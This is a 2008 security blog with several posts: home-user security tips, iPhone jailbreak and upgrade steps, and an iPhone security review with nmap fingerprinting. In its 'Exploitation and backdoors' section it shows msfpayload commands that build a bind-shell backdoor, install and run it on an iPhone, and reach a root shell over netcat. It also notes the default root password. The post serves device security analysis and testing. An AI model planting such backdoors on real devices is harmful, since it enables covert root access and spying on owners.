February 15, 2008

Don't do this at home!

After the Xmas holidays, the requests for help of our friends that got themselves a new computer was due. This mandatory free consultancy at least helps us to keep in touch with how the security problems affect to real people instead of corporate business.

Let me share with you my lessons learned (mainly on Vista security incidents) in a reverse ordered list with 5 ideas that I would like to spread to create some awareness among computer users:

5. Implement security from the beginning. Security is not something that you take care of when an incident has happened. Then it is too late. With the current status of the security threats (in one word: scary), it isn't wise to hope that it won't happen to you.

4. Use the security features of your operating system of choice. For example, don't disable User Access Control to tweak your computer. If you need a faster computer, buy it. If you don't, live with it or choose a different approach that fits your needs (like another OS). You don't remove the doors of your car to make it faster.

3. Don't trust silver bullets. Vista is more secure that XP, but still vulnerable. Especially if it isn't used properly. Also every anti-virus will fail to detect some malware. There is no 100% accuracy and the thread of a brand new malware that tries to get into your computer always exists.

2. Stop using administrative accounts for everything. Now it is possible to use Vista from a non-administrative account. It does work. Especially avoid using the administrator web surfing and P2P (instant messaging should also worry you).

1. Don't ever buy the security product ---anti-virus, anti-spyware, or you-name-it--- to solve your problem from the computer that is allegedly compromised. Once you have confirmation or suspicion that a computer is infected with malware, keep in mind that one of the most common pieces of malware is a key logger that will capture your data (personal and credit) and send it to the bad guys.

These were the presents that the three wise men brought to me. Just in case you wonder, the vista machines were compromised in less than an hour after their proud owners opened the shrink-wrap. No virtual machines were hurt during the writing of this post.


Internet Storm Center (ISC) Handler

Last month, January 2008, I became handler of the Internet Storm Center (ISC) - What is this? - It is an honor for me to be the first Spanish handler in History. Today (February 14, 2008) it has been my first shift as the Handler on Duty at the ISC and it has been a lot of fun, always considering that "with great power comes great responsibility" :)

Last week I published my first couple of posts, warning about multiple vulnerabilities in commonly used client software, and about the latest Adobe Reader vulnerability being exploited in the wild, a very serious issue; check that you are running Adobe Reader 8.1.2.

I published a couple of related posts today (plus a VoIP warning), as I strongly thing we need to improve and change the way we manage third-party application updates (on Windows mainly, but other OS too - Linux & Mac), both at the corporate and individual/user level. Only by eliminating vulnerabilities in a quick fashion through software updates, thus reducing the exposure of clients, we are going to be able to mitigate the impact of the security threats we deal with today, being botnets one of the most relevant ones.

For your reference and reading, these have been my first ISC diaries:
In order to get a feeling of what is happening on the Internet from a security perspective, the ISC diary should be one of your browser home pages (I had it as such before been a member).


February 05, 2008

Guide to upgrade the iPhone to 1.1.3 - Securing your 1.1.2 OTB iPhone

Apple released the iPhone 1.1.3 firmware version on January 2008. From a security perspective and according to Apple, the iPhone 1.1.2 presents a few vulnerabilities:
Continuing the iPhone series, once your iPhone 1.1.2 OTB has been activated and jailbroken, thanks to the iPhone Dev Team there is a new method to upgrade to 1.1.3 and stay secure. This post covers the easier option, that is, using the "Installer" to directly upgrade from the iPhone without requiring a PC (however, you need a WiFi connection to connect to the Internet). There are other methods for Windows and Mac too.

NOTE: All the third-party applications you previously installed will disappear from Springboard. You will need to reinstall them after the 1.1.3 upgrade. Some capabilities will break, as this "hack" is pretty new, so stay tuned on the Internet (Blogs, forums, etc) for fixes. Most probably, this is the last post about general iPhone hacks in the RaDaJo blog; only security topics will be posted in the future.

You need to be very careful adding new "Installer" sources, as an buggy or malicious software package install can render your iPhone useless... iBrick! If this happens to you, you can repeat the whole jailbreak process going back to 1.1.1. At this point, after following the whole jailbreak guide, the only sources available should be:
  • AppTap: AppTapp Official (NullRiver).
  • Community Sources: Conceited Software, ModMyiFone.com and Ste Packaging.
  • Makayama Software (if you tried to install the iSIM software tool).

  • You need to start with an activated and jailbroken 1.1.2 iPhone. Check the guide to do it!
  • You need to install the BSD Subsystem v2.0, as we did when we enabled the phone capabilities. You can check the version from "Installer" by selecting the "Uninstall" button.
  • Disable the lock timeout, as we already did on STEP 3 of the 1.1.2 guide: Go to "Settings", select "General" and the "Auto-Lock" option. Set the value to "Never".
  • Go to "Installer" and select the "Update" button. You need to use "Installer" version 3.0. Previous versions won't work.
  • Establish a connection with your WiFi network to get Internet access.

Steps to upgrade to version 1.1.3:
  • Go to "Installer" and select the "Install" button. Go to the "System" category and install the "Official 1.1.3 Upgrade". At this time it is version 1.1.3-3. Click on "Install" twice.
  • As indicated by the message, exit "Installer" and run "Upgrade" from the Springboard.
  • The process asks if you want to use hacktivation and patch lockdownd. Answer "Yes" in order to be able to use the phone capabilities with the hardware SIM hack (iPhone 1.1.2 OTB has the 4.6 bootloader and it can only be unlocked using a SIM hardware hack at this time).
  • Then, it asks if you want to completely restore your device, deleting all data. It is recommended to answer "Yes" to avoid any software conflicts between versions (backup first!), although I answered "No" to check what applications and data survived. All data should be there (music, videos, etc) and the applications are still installed but not referenced from Springboard.
  • The iPhone now downloads the 1.1.3 firmware version from Apple and performs the appropriate hacks. You get a progress banner on the iPhone. This process takes lot of time, around 30-60 minutes.
  • The last step shows a "Attempting to Reboot iPhone" message. If it is there for more than 15 minutes without rebooting, hold down the Power and Home buttons until the phone shuts down. Then hold down the Power button to turn the iPhone back on, a process that will take a few minutes.
  • When the process completes, the iPhone reboots and runs firmware 1.1.3!! The baseband version is not modified using this procedure.
If during the upgrade, you answer "No" to the first hacktivation question (as I did), then you need to patch lockdownd manually. If not, iTunes will generate an error message and the iPhone remains in an unactivated state. Download the patched lockdownd version and transfer it to the iPhone through SSH: "scp lockdownd root@" (before this, make a backup copy of the previous lockdownd version). Verify that the file permissions are 555. You can reboot the iPhone and it will be active now.

One of the first recommended actions is to update the "Installer" sources. Go to "Installer", select the "Install" button and go to the "Sources" category. Install the "Community Sources", version 3.3 at this time. By default, the sources list only contained the "AppTapp Official" entry. New applications for 1.1.3, such as "Tweaks (1.1.3)", are populated on the list of available packages, and four new entries are added to the sources list.

Go to "Settings", then "General" and "About" to check that the "Version" now is "1.1.3 (4A93)" while the "Modem Firmware" is still "04.02.13_G". The 1.1.3 version includes new features, that you could be simulated in 1.1.2, although now are already on your device:
  • The first thing you notice is that it notifies you about "Edit Home Screen" capabilities. You can now rearrange icons on the Springboard.
  • The new Google Maps Faux-GPS, based on triangulating your location using the mobile cell towers, doesn't work because the baseband is not updated during the process. Go to "Installer", "Install" button, "All Packages", search and install "Navizon GPS" (currently version 1.1.4). Create an account in "Navizon" to use the location service, and when it locates you once, you are ready to use the Google Maps Faux-GPS (sometimes you need to set Navizon's "Invisible" switch to "Off").
  • You can now send SMS messages to multiple users simultaneously.
The previous activation and hardware-based unlock (based on the iSIM card) work perfectly with the new 1.1.3 version. iWorld must not be reinstalled. All capabilities work as they did on 1.1.2, except some of the previously installed third-party applications, plus a few well-known bugs, because now the Springboard runs as "mobile" and not as "root" (good security improvement):
  • You need to refresh the sources on "Installer" and reinstall previous software packages. Although at this point you can access the iPhone through SSH and run standard Unix commands, it is recommended to reinstall at least the BSD Subsystem and the OpenSSH server.
  • Reinstall the "BSD Subsystem" by going to "Installer", use the "Install" button, go to "System", and select and install the "BSD Subsystem" (v2.0). This fixes some VT100 terminal display issues (like backspaces not showing properly).
  • OpenSSH is a crucial service to manage your iPhone. It can be reinstalled by going to "Installer", select "System" and install "OpenSSH" (currently v.4.6p1-1). There is no icon on the Springboard on 1.1.3 to disable the service, and the device has the default password (root/alpine) :(
  • You cannot use the Unix "passwd" command to change the password on 1.1.3, as it is broken. Don't even try! You get a message indicating this when you install the BSD Subsystem. Replace the passwd command by uploading this file to the "/usr/bin" iPhone directory (rename it from passwd113 to passwd). Make a copy of the previous passwd file. Change the new file permissions to 755: "chmod 755 /usr/bin/passwd". Now, you can run "passwd" to change the default password from a SSH terminal.
  • The recommended SSH management tool is called "BossPrefs". Go to "Installer", then select the "Install" button, "All Packages" and install "BossPrefs" (v1.53). It provides capabilities to enable/disable the SSH server and even set its state when the iPhone restarts (through the "Config" menu).
  • Set up the iPhone to the appropriate timezone. If you go to "Settings" and "Date & Time", when you change the "TimeZone" the "/var/db/timezone/localtime" file is recreated. The directory is now owned by root, but the "Settings" application runs as "mobile", so it cannot recreate it. Change the directory permissions to 777: "chmod 777 /var/db/timezone".
  • Re-add the Makayama repository is you want to manage contacts with the iSIM tool.

The current 1.1.3-3 update fixes several issues of the previous 1.1.3 jailbreaks. There is a similar 1.1.3 method available from Nate True's (FAQ), however, it seems it could present some issues, so the latest Dev Team's (-3) method is the recommended method. More bugs, fixes and 1.1.3 jailbreak versions will appear. From now on, Google is your friend! ;)

Some final iPhone hacking news: Apple's applications signature key required by "official" iPhone third-party applications has leaked, and the iPhone 1.1.3 SDK framework documentation is available.


February 02, 2008

iPhone - Security 101

Once you get access and can finally use your iPhone, it is time to focus on the security of the device (this is what the RaDaJo Blog is all about ;) ). This post covers the basics (Security 101), while future post will focus on specific iPhone capabilities, such as WiFi, Bluetooth, etc. It is interesting to analyze the security of the iPhone from two distinct angles:
  • A device we need to protect as is (going to be) in wide spread use and, potentially, is going to store very sensitive and private information (call and SMS history, address book, voicemail data, user and mail credentials, application data, etc) and be used for voice and data communications.
  • A mobile auditing device that could be used by infosec professionals to perform assessment in standard TCP/IP networks, and WiFi or Bluetooth environments. Remember it runs Unix, has plenty of storage (8Gb) and a decent CPU (400Mhz), plus extensive networking capabilities.
For now, let's focus on the first one.

NOTE: Although I figured out I duplicated some of the steps already performed by Paul Asadoorian, I wanted to double-check the results and verify if there were any differences between a standard 1.1.2 iPhone and a jailbroken one.

General iPhone Security
  • After getting access to an iPhone Unix shell, you can observe that every process runs as root. This is why the jailbreak process succeed, as the exploitation of the libtiff vulnerability through MobileSafari provided unlimited privileges on the device. Any future security flaw in any iPhone application can lead to a similar complete system compromise.
  • The first known iPhone exploit was focused on vulnerabilities on the Perl Regular Expression Library (PCRE), and presented on BlackHat 2007.
  • The iPhone is a fully-fledged client device, a mobile Mac, with support for Word, Excel and PDF docs. Watch out future vulnerabilities in the associated applications!
  • The Metasploit Framework (MSF v3) already implements several payloads for the iPhone: bind and reverse shell, and even one to make it vibrate. See initial HD Moore security analysis.
  • The iPhone multimedia capabilities can turn it into a perfect spying tool, specially by hacking the mic/speakers, camera and phone.
  • As a consequence of the hacking wars between Apple and the community to free the device, the iPhone comes with the latest firmware installed from factory, 1.1.2 at this point in time. This is not always the case for lots of devices, as Paul points out.
  • This is one of the most well known iPhone hacking demonstrations on the Internet: it turns the iPhone into a remote eavesdropping device or bug. You can see the video here! Metasploit was used to install a recording tool, called rrecord (remote record), that records the ambient sound around the iPhone.
OS Fingerprinting
Using nmap 4.50, the iPhone ( operating system (OS) can be easily fingerprinted:
# nmap -O

Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 14:44 GMT
All 1711 scanned ports on are closed
MAC Address: 00:1E:C2:XX:XX:XX (Apple)
Device type: phone|media device|general purpose|web proxy|specialized
Running: Apple embedded, Apple Mac OS X 10.2.X|10.3.X|10.4.X|10.5.X, \
Blue Coat SGOS 5.X, FreeBSD 4.X, VMWare ESX Server 3.0.X
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results ...
Nmap done: 1 IP address (1 host up) scanned in 30.819 seconds

Because all the near 2000 scanned ports are closed, nmap output is not very accurate and it simply reflects a OS X device. At the end of the jailbreak process we installed SSH. If the SSH service is enabled, then the nmap results are much more accurate (simply by using an open and a closed port, 22 and 80 respectively):
# nmap -O -p 22,80

Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 14:42 GMT
Interesting ports on
22/tcp open ssh
80/tcp closed http
MAC Address: 00:1E:C2:XX:XX:XX (Apple)
Device type: phone|media device
Running: Apple embedded
OS details: Apple iPhone mobile phone or iPod Touch audio player (Darwin 9.0.0d1)
Uptime: 686.942 days (since Tue Feb 14 16:05:40 2006)
Network Distance: 1 hop

OS detection performed. Please report any incorrect results ...
Nmap done: 1 IP address (1 host up) scanned in 19.619 seconds

If you browse the Web with the iPhone (using the MobileSafari browser) and point it to your own Web server (, you can easily obtain the device User-Agent. What really surprised me was that you can even get the exact firmware version, 3B48b (meaning 1.1.2):
$ nc -l -p 80
GET / HTTP/1.1
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 \
(KHTML, like Gecko) Version/3.0 Mobile/3B48b Safari/419.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html; \
Connection: keep-alive

The iPhone responds to ping (ICMP echo requests) by default. It seems it could present a potential Etherleak vulnerability, and in fact, I can confirm Paul initial research, as I got the same behavior. BTW, the old Linksys WRT54G v5 (firmware version 1.00.2 - Oct. 31, 2005) I used for these tests suffers the same vulnerability (last 4 bytes are always different).

By default, connection establishments to closed TCP ports are answered with a TCP RST packet, and connection establishments to closed UDP ports are answered with an ICMP Port Unreachable packet.

If the SSH service is turned off (see next section), a full TCP scan only shows one port open, port TCP/62078:
# nmap -sT -p1-65535

Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 02:08 GMT
Interesting ports on
Not shown: 65534 closed ports
62078/tcp open unknown
MAC Address: 00:1E:C2:XX:XX:XX (Apple)

Nmap done: 1 IP address (1 host up) scanned in 64531.180 seconds

The TCP/62078 port is used internally when syncing with iTunes. Using tcpdump on the "lo0" interface from within the iPhone, it is possible to capture the traffic generated during a sync operation on iTunes. This traffic contains binary data and XML strings. It also uses other source and destination ports in the 49xxx range during the sync operation, always using the localhost address as source and destination.

A full UDP scan only shows the Multicast DNS port open, UDP/5353:
# nmap -sU -T4 -p1-65535

Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-14 03:00 GMT
Interesting ports on
Not shown: 65534 closed ports
5353/udp open|filtered zeroconf
MAC Address: 00:1E:C2:XX:XX:XX (Apple)

Nmap done: 1 IP address (1 host up) scanned in 4966.680 seconds

Port UDP/5353 corresponds to the Zeroconf (aka Rendezvous or Bonjour) multicast protocol, or Zero Configuration Networking, used to establish networking connections without configuration or servers. The mDNSResponder service runs by default on this port and advertises the device on the local network, exposing device details. The multicast DNS traffic generated (destination IP contains the device hostname, "iPhone", followed by a hyphen ("-") and the WiFi MAC address. Related details are leaked on the DHCP requests used to obtain an IP address. The iPhone includes its name on the requests, that by default is "iPhone".

The external port findings can be ratified by running "netstat" on the device. Surprisingly, specially with port TCP/62078, the bindings for all TCP and UDP ports discovered are made to all addresses (*.*).

The SSH service is enabled by default after the jailbreak. Specifically, the iPhone is running the OpenSSH 4.6 version. This info can be easily obtained using netcat or nmap:
# nc 22

# nmap -sV -p 22

Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 14:39 GMT
Interesting ports on
22/tcp open ssh OpenSSH 4.6 (protocol 2.0)
MAC Address: 00:1E:C2:XX:XX:XX (Apple)

Service detection performed. Please report any incorrect results ...
Nmap done: 1 IP address (1 host up) scanned in 17.232 seconds

The SSH access is almost useless unless you install the BSD Subsystem that provides all the standard Unix commands and tools.

Exploitation and backdoors
HD Moore did a great job in the "Cracking the iPhone" series, dissecting the iPhone internals, providing debugging tools, and walking the reader through the process of writing the exploit for the libtiff vulnerability; not an easy task, since the iPhone stack memory is marked non-executable, therefore, standard stack-based buffer overflows don't work. The original libtiff exploit, and HD Moore's one, use the return-to-libc technique. Then, the exploit was improved and modified for stock iPhones (non-jailbroken). Very interesting read of a multi-part payload (stager/stage) to execute code inside the iPhone, that finishes with a full MSF v3 session showing how to run the ipwn shell after exploiting the libtiff vulnerability, and how to patch this vulnerability.

As explained there, Metasploit provides support for iPhone executables in the "msfpayload" tool. This allows an attacker or pen-tester to create a stand-alone backdoor (iPhone executable) that can bind a shell to a port or launch a reverse shell or make the iPhone vibrate:
$ msfpayload osx/armle/shell_bind_tcp LPORT=2222 X > /tmp/bindshell.bin
Created by msfpayload (http://www.metasploit.com).
Payload: osx/armle/shell_bind_tcp
Length: 200
Options: LPORT=2222

To create the backdoor, this "bindshell.bin" binary should be copied to the iPhone (for example using PSCP to "/tmp"), its permissions changed, and executed. Then, a new shell is offerered on port TCP/2222 that can be remotely accessed with netcat:
$ ssh root@
# cd /tmp
# chmod u+x bindshell.bin
# ./bindshell.bin

$ nc
uid=0(root) gid=0(wheel) groups=0(wheel)
ls -l
total 80
drwx------ 2 root wheel 102 Feb 2 02:56 MediaCache
-rw-r--r-- 1 root wheel 0 Feb 2 04:16 MobileSyncRunning.lock
-rwxr--r-- 1 root wheel 16472 Feb 2 05:01 bind.bin
drwx------ 2 root wheel 102 Feb 2 02:56 launchd
-rw-r--r-- 1 root wheel 16472 Feb 2 05:01 vibrate.bin
uname -a
Darwin 9.0.0d1 Darwin Kernel Version 9.0.0d1: Wed Oct 10 00:07:50 PDT
2007; root:xnu-933.0.0.204.obj~7/RELEASE_ARM_S5L8900XRB iPhone1,1 unknown

I want to close this initial iPhone security post emphasizing one of the major risks with the current software distribution model on the iPhone. After the jailbreak it is possible to install third-party apps on the device through the "Installer" package manager. Users could download malicious software from the available repositories. In fact, exploiting this input vector, the first iPhone malware specimen was released early this year. It used social engineering tricks to present itself as a preparation software required to update to version 1.1.3, but it was not very dangerous this time. What if someone publishes the Metasploit payloads described before through "Installer"? Additionally, and although it was not created with malicious intentions, there is a Mobile Safari plug-in that provides file downloading capabilities to the browser - another way of downloading all kind of files into the device.


How to add the "Phone" to the iPhone

In the previous iPhone series I covered how to activate & jailbreak the iPhone 1.1.2 OTB (Out of The Box) on Windows. However, there was no software trick to unlock the device and use the phone functionality if the iPhone runs the 4.6 bootloader version. Although some contests gave an incentive too find a solution, it seems there is no software trick available yet. Therefore, my friend Esteban ordered and recently got his iSIM, a hardware SIM "card" that can be used together with your standard SIM card in order to use the phone with mobile operators different from AT&T (or the other Apple's European telecom partners).

One of the first set of tools you may want to install inside the iPhone is the BSD Subsystem. Connect to the wireless network from the iPhone, and select the "Installer" icon on the Springboard. Click on the "Install" button, go to "System", and select and install the "BSD Subsystem" (v.2.0 at this time). This package includes the standard Unix tools for the iPhone.

If you (still) doubt about your bootloader version , you can check it following these steps (they are not required to use the iSIM):
  1. From step 4 of the guide, we have an SSH server running on the iPhone. Turn it on through the SSH icon on the Springboard.
  2. You need to find and download from the Internet a tool called "bbupdater". Google is your friend! It seems the file MD5 value is 846e1ddada152947cc317a23de671525.
  3. Enable your wireless network, and connect to it from the iPhone. Then, transfer the "bbupdater" tool from your computer to the iPhone as root (into "/usr/bin") using a SSH client for Windows, such as "pscp" (PuTTY): "pscp bbupdater root@"
  4. Login as root on the iPhone through SSH using PuTTY, change the permissions on the file to make it executable, and run the "bbupdater" tool. The last line of the output displays the bootloader version.

After checking the version, restart the iPhone by typing the "reboot" command. You can turn off the SSH server if you are not going to connect back to it.

The process to use the iSIM and unlock the iPhone by hardware is very simple:
  1. Prepare your standard SIM to "accommodate" the iSIM. You will need to follow the instructions from your iSIM vendor, that in Esteban's case, required to cut a corner of the SIM to fit and install both together inside the iPhone.
  2. Install the iWorld application. Connect to the wireless network from the iPhone, and select the "Installer" icon on the Springboard. Click on the "Install" button, go to "Tweaks (1.1.2)", and select and install "iWorld". This package fixes a bug in the iPhone that limits the device to use the phone or SMS capabilities with non-supported SIMs. If you try to call to any number at this point without iWorld, the phone or SMS applications crash.
  3. Once installed, select the new "iWorld" icon from the Springboard and select your country. The iPhone will reboot to set your country settings.
  4. Click on the "Phone" icon on the Springboard, type a number, and... establish your first call from your iPhone!!
NOTE: At the time of this writing, the "Installer" will ask you to update to a newer version, 3.0. I recommend you to update.

It is important not to confuse the iSIM hardware SIM card (or TurboSIM, etc) with the iSIM software tool. The iSIM tool is available through the Makayama repository, "http://tinyurl.com/2t8cax" (add this URL to your "Installer" sources if you want to use it) and provides capabilities to manage the contacts between the iPhone and the SIM card. Go to "Installer", select the "Install" button, then "Utilities" and install "iSIM" (v1.03 at this time).

The next thing I'm going to get from Apple is the i-Jam ;)